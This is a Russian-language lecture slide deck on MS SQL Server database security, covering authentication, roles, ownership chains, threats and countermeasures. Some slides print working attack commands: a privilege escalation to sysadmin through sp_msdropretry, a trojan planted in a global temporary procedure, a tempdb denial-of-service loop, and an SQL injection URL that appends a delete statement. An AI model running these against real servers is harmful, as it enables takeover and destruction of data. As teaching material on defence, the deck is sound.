Презентация на тему "Безопасность СУБД"

Презентация: Безопасность СУБД
Включить эффекты
1 из 31
Ваша оценка презентации
Оцените презентацию по шкале от 1 до 5 баллов
  • 1
  • 2
  • 3
  • 4
  • 5
4.0
1 оценка

Комментарии

Нет комментариев для данной презентации

Помогите другим пользователям — будьте первым, кто поделится своим мнением об этой презентации.


Добавить свой комментарий

Аннотация к презентации

Скачать презентацию (1.84 Мб). Тема: "Безопасность СУБД". Предмет: информатика. 31 слайд. Для студентов. Добавлена в 2016 году. Средняя оценка: 4.0 балла из 5.

Содержание

  • Презентация: Безопасность СУБД
    Слайд 1

    Безопасность СУБД Раздел IV

  • Слайд 2

    БезопасностьСУБД Рассматриваемые темы: Модель безопасности СУБД MS SQL Server Анализ защищённости СУБД

  • Слайд 3

    Безопасность СУБД

    ПРИЛОЖЕНИЯ СУБД ОС СЕТЕВЫЕ СЛУЖБЫ ПОЛЬЗОВАТЕЛИ Пользовательские бюджеты Механизм аудита Механизм разграничения доступа Язык программирования Механизм управления паролями

  • Слайд 4

    Методы аутентификации

    Integrated Windows NTLM Kerberos Local SAM Active Directory pass XOR 0xA5 master sysxlogins pwd pwdencrypt(pass) SQL Server Authentication

  • Слайд 5

    Разграничение доступа

    master sysxlogins Server login select * from db.table db table Database master Database DB db sysusers Db user db syspermissions Grant Blank Deny

  • Слайд 6

    Стандартные учетные записи

    Server login SA Builtin/Administrators Standard Windows Group Database Users DBO Guest master tempdb

  • Слайд 7

    Роли пользователей

    Создавать БД Создавать login Удалять БД Читать данные Удалять таблицу Писать данные Роли уровня сервера Роли уровня БД public

  • Слайд 8

    Стандартные роли уровня сервера

  • Слайд 9

    Стандартные роли уровня базы данных

  • Слайд 10

    Управление сервером

  • Слайд 11

    Цепочка владения

    Ownership Chains Db.owner. user_table Db.owner.sp_select DECLARE @usr char(30) SET @usr = user SELECT * from user_table where user_name=@usr user - execute user - select user select * from user_table exec sp_select

  • Слайд 12

    Угрозы безопасности СУБД

    Компрометация ОС с помощью СУБД Использование системных хранимых процедур Обход защитных механизмов при физическом доступе Перехват данных при передаче по сети Использование цепочки владения для повышения полномочий Получение паролей пользователей Внедрение SQL кода (SQL Injection)

  • Слайд 13

    Шифрование трафика (SSL/TLS)

    Перехват данных при передаче по сети 1. Получить Server Authentication Certificate для использования с FQDN сервера 2. Установить сертификат в локальное хранилище компьютера 3. Включить шифрование Force Protocol Encryption 4. Проверить соединение (ODBC): Driver=SQLServer;Server=ServerName; Network=DBNETLIB.DLL;Encrypt=YES

  • Слайд 14

    Учетные записи служб

    SQL Server Server Agent Microsoft Search DTS Local System User Local System User Local System User Local System User Компрометация ОС с помощью СУБД

  • Слайд 15

    Шифрование баз данных

    Обход защитных механизмов при физическом доступе Выполнить рекомендации по настройке EFS Настроить сервис сервера на запуск от имени доменной учетной записи Остановить SQL сервер Зайти в систему от имени доменной учетной записи Использовать утилиту chipherс ключом /Wдля шифрования файлов базы данных (*.ldf, *.mdf) Очистить кэш доменных учетных записей Запретить вход на сервер группе builtin/administrators Использовать SysKey

  • Слайд 16

    Межбазовая цепочка владения

    Cross database ownership chain Master.dbo. sysxlogins Database master Database test dbo test.dbo.test create proc dbo.test as select * from master.dbo.sysxlogins exec test

  • Слайд 17

    Получение пользователем db_owner привилегий sa Создаем вид для модификации таблицыsysxlogins create view dbo.test2 as select * from master.dbo.sysxlogins Используем ошибку в sp_msdropretry для замены sid (0x01=sa) exec sp_msdropretry ‘xx update sysusers set sid=0x01 where name= ‘’dbo’’’, ‘xx’ Set xstatus field to 18 (sysadmin) exec sp_msdropretry ‘xx update dbo.test set xstatus=18 where name= SUSER_SNAME()’, ‘xx’

  • Слайд 18

    Способ защиты Отключена по умолчанию в SQL Server 2000 Service Pack 3 Есть возможность включить в пределах сервера и отдельной базы данных База данных master не поддерживает опцию db chaining exec sp_configure «Cross DB Ownership Chaining», «1» exec sp_dboption «databasename», «db chaining», «true»

  • Слайд 19

    Троянский код в хранимых процедурах

    Временные хранимые процедуры: Могут быть созданы любым пользователем Могут быть выполнены любым пользователем Могут быть модифицированы любым пользователем select name from tempdb..sysobjects where name like '##%' 1. Поиск процедуры: 2. Модификация: alter proc ## as 3. Ожидание выполнения привилегированным пользователем

  • Слайд 20

    Microsoft не считает данное поведение уязвимостью Глобальные процедуры работают в соответствии с документацией «by Design» Вывод: Не использовать глобальные хранимые процедуры

  • Слайд 21

    Отказ в обслуживании

    Временные таблицы могут создаваться любым пользователем Пользователь guestне может быть удален из базы данных tempdb create table #tmp (x varchar(8000)) insert into #tmp select 'X' while 1=1 insert into #tmp select * from #tmp

  • Слайд 22

    Использование временных таблиц Database temp Database test user #tmp create table #tmp (x varchar(8000)) insert into #tmp select 'X' while 1=1 insert into #tmp select * from #tmp #tmp

  • Слайд 23

    SQL Injection

    Метод обхода логики приложения и получения непосредственного доступа к данным путем внедрения во входную информацию, обрабатываемую приложением операторов языка SQL SQL Injection могут быть подвержены: - WEB приложения - Двухзвенные приложения - Хранимые процедуры

  • Слайд 24

    WWW id = Request.querystring("id") SQL_query = "SELECT * FROM test where id="+id Set RS = MyConn.Execute(SQL_query) http://ws-gordeyechik/inject.asp?id=1 select * from test where id=1

  • Слайд 25

    http://ws-gordeyechik/inject.asp?id=1;delete from test id = Request.querystring("id") SQL_query = "SELECT * FROM test where id="+id Set RS = MyConn.Execute(SQL_query) WWW select * from test where id=1; delete from test

  • Слайд 26

    Программа Data Thief

  • Слайд 27

    Практическая работа 23

    Исследование метода SQL Injection

  • Слайд 28

    Анализ защищённости СУБД

    ПРИЛОЖЕНИЯ СУБД ОС СЕТЕВЫЕ СЛУЖБЫ ПОЛЬЗОВАТЕЛИ Database Scanner

  • Слайд 29

    Выполняемые проверки

  • Слайд 30

    Практическая работа 24

    Анализ защищённости СУБД MSSQL Server с помощью программы Database Scanner

  • Слайд 31

    Вопросы ?

Посмотреть все слайды

Сообщить об ошибке